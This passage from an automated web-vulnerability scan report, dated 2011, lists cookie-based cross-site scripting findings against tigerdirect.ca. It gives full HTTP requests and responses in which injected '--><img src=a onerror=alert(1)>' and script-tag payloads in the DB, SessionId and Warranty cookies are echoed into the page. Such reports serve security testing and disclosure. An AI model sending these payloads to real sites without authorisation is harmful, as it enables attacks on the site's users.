<!--Cart(rNavCatId) :^D>>Desktop Computers>>category_tlc.asp?CatId=6^D>>Monitors>>category_tlc.asp?CatId=12^D>>Laptops &amp; Notebooks>>category_tlc.asp?CatId=17531a8--><img src=a onerror=alert(1)>5c3e9baaabe-->
...[SNIP]...

3.486. http://www.tigerdirect.ca/retailstores/indexca.asp [DB cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /retailstores/indexca.asp

Issue detail

The value of the DB cookie is copied into an HTML comment. The payload cab00--><img%20src%3da%20onerror%3dalert(1)>1edab8d440b was submitted in the DB cookie. This input was echoed as cab00--><img src=a onerror=alert(1)>1edab8d440b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /retailstores/indexca.asp HTTP/1.1
Host: www.tigerdirect.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.ca/cgi-bin/order.asp?EdpNo=1104495%27&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128
Cookie: Warranty=POPPED; SRCCODE=CANWGOOFS; beta=Y; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell&PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12cab00--><img%20src%3da%20onerror%3dalert(1)>1edab8d440b; SRVR=WEBX14%2D03B; SessionId=492415201109300846025023123106; CoreID6=70269293307913173868372&ci=90215357; 90215357_clogin=l=1317386837&v=7&e=1317388681139; CoreAt=90215357=1|2|0|0|0|0|0|0|0|0|0|0|1|1317386837||&

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:52:01 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA03A
X-Powered-By: ASP.NET
Set-Cookie: SRVR=WEBX14%2D03A; path=/
Set-Cookie: DB=msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12cab00%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1edab8d440b&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: Cart=PHRoutine=25&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavLastVisit=&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17531a8%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5c3e9baaabe; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 113871


<html>
<head>
<title>Computer Stores, Discount Computer Stores, Retail Computer Stores. TigerDirect.ca</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta nam
...[SNIP]...
<!--DB(msRandX) :4488505%2d%2d%3e%3cScRiPt%3ealert%281%29%3c%2fScRiPt%3e3d7c791fd12cab00--><img src=a onerror=alert(1)>1edab8d440b-->
...[SNIP]...

3.487. http://www.tigerdirect.ca/retailstores/indexca.asp [SessionId cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /retailstores/indexca.asp

Issue detail

The value of the SessionId cookie is copied into an HTML comment. The payload 200ee--><img%20src%3da%20onerror%3dalert(1)>69b74c839f5 was submitted in the SessionId cookie. This input was echoed as 200ee--><img src=a onerror=alert(1)>69b74c839f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /retailstores/indexca.asp HTTP/1.1
Host: www.tigerdirect.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.ca/cgi-bin/order.asp?EdpNo=1104495%27&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128
Cookie: Warranty=POPPED; SRCCODE=CANWGOOFS; beta=Y; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell&PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12; SRVR=WEBX14%2D03B; SessionId=492415201109300846025023123106200ee--><img%20src%3da%20onerror%3dalert(1)>69b74c839f5; CoreID6=70269293307913173868372&ci=90215357; 90215357_clogin=l=1317386837&v=7&e=1317388681139; CoreAt=90215357=1|2|0|0|0|0|0|0|0|0|0|0|1|1317386837||&

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:52:09 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Set-Cookie: SRVR=WEBX13%2D01A; path=/
Set-Cookie: DB=msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12cab00%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E1edab8d440b&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: Cart=PHRoutine=25&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavLastVisit=&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17531a8%2D%2D%3E%3Cimg+src%3Da+onerror%3Dalert%281%29%3E5c3e9baaabe; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 113918


<html>
<head>
<title>Computer Stores, Discount Computer Stores, Retail Computer Stores. TigerDirect.ca</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta nam
...[SNIP]...
<!--SessionId :492415201109300846025023123106200ee--><img src=a onerror=alert(1)>69b74c839f5-->
...[SNIP]...

3.488. http://www.tigerdirect.ca/retailstores/indexca.asp [Warranty cookie]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tigerdirect.ca
Path:   /retailstores/indexca.asp

Issue detail

The value of the Warranty cookie is copied into an HTML comment. The payload 87a7f--><img%20src%3da%20onerror%3dalert(1)>a511299d89d was submitted in the Warranty cookie. This input was echoed as 87a7f--><img src=a onerror=alert(1)>a511299d89d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /retailstores/indexca.asp HTTP/1.1
Host: www.tigerdirect.ca
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tigerdirect.ca/cgi-bin/order.asp?EdpNo=1104495%27&qty=1&cm_re=Homepage-_-Spot%2003-_-CatId_4441_P229-1128
Cookie: Warranty=POPPED87a7f--><img%20src%3da%20onerror%3dalert(1)>a511299d89d; SRCCODE=CANWGOOFS; beta=Y; Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell&PHRoutine=25&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavLastVisit=&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17; DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&Sidenav=B&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&msProduct=1782290&msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12; SRVR=WEBX14%2D03B; SessionId=492415201109300846025023123106; CoreID6=70269293307913173868372&ci=90215357; 90215357_clogin=l=1317386837&v=7&e=1317388681139; CoreAt=90215357=1|2|0|0|0|0|0|0|0|0|0|0|1|1317386837||&

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 12:51:45 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-SV: MIA01A
X-Powered-By: ASP.NET
Set-Cookie: SRVR=WEBX13%2D01A; path=/
Set-Cookie: DB=msRandX=4488505%252d%252d%253e%253cScRiPt%253ealert%25281%2529%253c%252fScRiPt%253e3d7c791fd12a4be4dd2722fcb8d5183d383&msProduct=1782290&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&Sidenav=B&msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg; path=/
Set-Cookie: Cart=PHRoutine=25&Landing=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Ficart%2Easp%3Fp%3Dupsell&rNavSearch=%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E%5ED%3E%3ETop+Product%3A+%3E%3E&rNavEdpDesc=%5ED%3E%3ELogitech+%2D+V220+%2D+Cordless+Optical+Mouse%3E%3EEdpNo%3D3198091%5ED%3E%3ESeagate+2TB+Expansion+External+Drive%3E%3EEdpNo%3D5532176%5ED%3E%3ESabrent+68%2Din%2D1+USB+2%2E0+External+Card+Reader+%26amp%3B+Wri%3E%3EEdpNo%3D1951865&rNavLastVisit=&Referer=http%3A%2F%2Fwww%2Etigerdirect%2Eca%2Fcgi%2Dbin%2Forder%2Easp%3FEdpNo%3D1104495%2527%26qty%3D1%26cm%5Fre%3DHomepage%2D%5F%2DSpot%252003%2D%5F%2DCatId%5F4441%5FP229%2D1128&rNavCatId=%5ED%3E%3EDesktop+Computers%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D6%5ED%3E%3EMonitors%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D12%5ED%3E%3ELaptops+%26amp%3B+Notebooks%3E%3Ecategory%5Ftlc%2Easp%3FCatId%3D17a4be4dd21fe1b0d990d6cbc1; path=/
Set-Cookie: beta=Y; path=/
Set-Cookie: SRCCODE=CANWGOOFS; expires=Sun, 30-Oct-2011 04:00:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 113878


<html>
<head>
<title>Computer Stores, Discount Computer Stores, Retail Computer Stores. TigerDirect.ca</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta nam
...[SNIP]...
<!--Warranty :POPPED87a7f--><img src=a onerror=alert(1)>a511299d89d-->
...[SNIP]...

Report generated by dork at Fri Sep 30 07:54:40 CDT 2011.